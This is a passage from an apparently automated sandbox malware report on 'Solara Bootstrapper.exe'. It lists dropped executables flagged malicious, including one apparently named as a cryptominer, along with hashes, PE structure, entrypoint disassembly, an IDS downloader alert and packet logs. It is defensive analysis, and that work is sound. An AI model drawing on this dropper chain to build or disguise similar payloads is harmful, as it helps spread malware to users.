Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcqg1hf0.5e2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkzjbc51.bh5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvmzvlqd.f1t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuzu5yj4.y5t.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwxnmgen.v3r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\kx new.exe

Download File

Process:	C:\Users\user\Desktop\Solara Bootstrapper.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10948608
Entropy (8bit):	6.9823288417626
Encrypted:	false
SSDEEP:	196608:p+lBkH0sN5KVaq4Jsbwd+mftM8y+uevftTJp3q73uGiCHz/u/dLTu:l0saVF4Js8d+F+53Ra3Tj41u
MD5:	D9D13FA25E880665FB471A4BE57C494C
SHA1:	7A4C1B09A9D37FF55872544A39A2CC5F0EEC9523
SHA-256:	632E973AB369D51E21B499E440BDD9C4B2FFAAC9E435485A648DE8724E1B19F7
SHA-512:	CF20F3C108865614A27D498EE74198EE151027423B518024155B1DFF553B33877AED81E7D5394094625D1EE7DA5DE82FA4ED119420009A3F3FC51019ADD3522E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................@.......o..........................................P....0..................................................................................X............................text...h........................... ..`.rdata....... ......................@..@.bss......... ...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xmr new.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\kx new.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5471744
Entropy (8bit):	6.508687886623363
Encrypted:	false
SSDEEP:	98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
MD5:	7D6398EBFB82A24748617189BF4AD691
SHA1:	6C96D0E343E1E84BF58670F1249C1694A2012F04
SHA-256:	D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
SHA-512:	9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......\|S.............@..B................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1777
Entropy (8bit):	3.548832160380353
Encrypted:	false
SSDEEP:	24:AHq6saJQXQK6zkp5nFC3xtKEkyNodeI5nFC3udee:6s/Xv6zklC3aEky+de2C3udee
MD5:	6B22E6EF2B3890EABF2B786625B0194C
SHA1:	33B927413CB71314A4A6D4300793CFCDFF179477
SHA-256:	FE3EBD9F7FD8EC38410E0A064C6B8BAA2E67DB5F5EF9462380D4E7AFCF134DB6
SHA-512:	0C6E2F2D62EDAB4C25FE0680725A3BC2015FF9575385665B9D76FC3B7BDE8F4CB1664CD6C6EE35F63FBDFC39E4BE9FB75EBFFB8ED10F135B6C8D874F7E979388
Malicious:	false
Preview:	,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.001181834719954
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	Solara Bootstrapper.exe
File size:	10'967'040 bytes
MD5:	00a1864355a5ea47902e5757c0d87fd9
SHA1:	4be5647308e0925fb00fae068cb4a89a8a449afc
SHA256:	4289002fd7528974ae7a9bf4d855bfd3812d248a46dbd7f94e7336f260ae7a39
SHA512:	7f86e42676cfd77aafd7a030656ad88d041ba54edc6eab41193528b03e79850f89e7d79679e6a14fff8e69d7011e36e03d09c73a46e8fc722dc126c3da4be718
SSDEEP:	196608:NaAEXnVB2t0vW54zu9cQ+6SLwC9tpg9FHh2C32cIPTv3O:NajFECvW5R9ccSLfYHhhbMv3
TLSH:	35B6231DD0DCAA8B82FB5338E827396BB56C4191071A9F27745B837B064CBD7D289F48
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................L...............p....@........................................................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014d1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a9c887a4f18a3fede2cc29ceea138ed3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007F9C84D431ADh
add esp, 0Ch
mov eax, 004014AFh
push eax
call 00007F9C84D431E7h
mov eax, 00000001h
push eax
call 00007F9C84D431E4h
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007F9C84D431D8h
add esp, 08h
mov eax, dword ptr [00E76624h]
mov ecx, dword ptr [00E76628h]
mov edx, dword ptr [00E7662Ch]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [00E77000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007F9C84D431B2h
add esp, 14h
mov eax, dword ptr [00E76624h]
mov ecx, dword ptr [00E76628h]
mov edx, dword ptr [00E7662Ch]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
push eax
call 00007F9C84D42F8Ch
add esp, 0Ch
push eax
call 00007F9C84D43188h
add esp, 04h
leave
ret
push ebp
mov ebp, esp
sub esp, 00000004h
nop
mov eax, dword ptr [00E76624h]
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa765b0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa78000	0x2f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa76600	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x668	0x800	4c74066f77085e6570c9d09d54d43fcf	False	0.40673828125	data	4.589471170872518	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0xa747b3	0xa74800	6bcbd350d25bbdfeddfe9c8ec8409966	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0xa77000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xa78000	0x2f8	0x400	8cb029179f4b7718540b784c3859b47e	False	0.353515625	data	4.268538415503129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xa78058	0x29b	XML 1.0 document, ASCII text	English	United States	0.4707646176911544

Imports

DLL	Import
msvcrt.dll	malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll	ShellExecuteA
kernel32.dll	SetUnhandledExceptionFilter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T16:09:11.358836+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	140.82.121.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 16:09:08.109124899 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:08.109164953 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:08.109232903 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:08.121334076 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:08.121351957 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:08.771646023 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:08.771797895 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:08.775651932 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:08.775664091 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:08.776070118 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:08.876866102 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:08.923330069 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.236427069 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.236543894 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.236588955 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.236618042 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.236629009 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.236659050 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.237118006 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.237210035 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.237215996 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.237282991 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.237335920 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.237368107 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.237374067 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.237426043 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.237433910 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.303818941 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.321273088 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327172041 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327215910 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327235937 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.327248096 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327357054 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.327363014 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327460051 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327543974 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.327549934 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327886105 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327927113 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.327975988 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328006983 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.328012943 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328079939 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.328085899 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328267097 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.328707933 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328784943 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328847885 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328883886 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.328888893 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.328986883 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.329520941 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.329606056 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.329680920 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.329687119 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.329724073 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.329889059 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.329895020 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.406316996 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.406407118 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.406420946 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.412216902 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.412251949 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.412283897 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.412300110 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.412328959 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.412355900 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.418554068 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418593884 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418617964 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.418628931 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418670893 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418699026 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.418704987 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418740988 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418768883 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.418773890 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418807983 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418833971 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.418843985 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.418916941 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.419740915 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.419801950 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.419848919 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.419878960 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.419887066 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.419922113 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.419949055 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.419953108 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.419965982 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420111895 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420202971 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420212030 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.420221090 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420259953 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420289040 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420289993 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.420308113 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.420618057 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.421020985 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421093941 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421116114 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.421127081 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421164036 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421200991 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421226025 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.421231985 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421257019 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.421933889 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.421974897 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.422009945 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.422046900 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.422071934 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.422079086 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.422343969 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.422348976 CET	443	49704	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:09.427484989 CET	49704	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:09.454504013 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:09.454544067 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:09.454636097 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:09.454998016 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:09.455014944 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:09.925046921 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:09.925144911 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:09.929025888 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:09.929040909 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:09.929301977 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:09.931894064 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:09.979341030 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:10.052758932 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:10.052870989 CET	443	49705	185.199.109.133	192.168.2.5
Jan 7, 2025 16:09:10.052939892 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:10.053426027 CET	49705	443	192.168.2.5	185.199.109.133
Jan 7, 2025 16:09:10.414700031 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:10.414752007 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:10.414840937 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:10.415663004 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:10.415677071 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.083296061 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.089555025 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.089590073 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.358840942 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.358922958 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.358969927 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.358980894 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.358992100 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.359019995 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.359103918 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.359168053 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.359174967 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.359206915 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.359261990 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.359266043 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.403033018 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.403106928 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.403119087 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.442605972 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.442687035 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.442696095 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.450503111 CET	443	49706	140.82.121.3	192.168.2.5
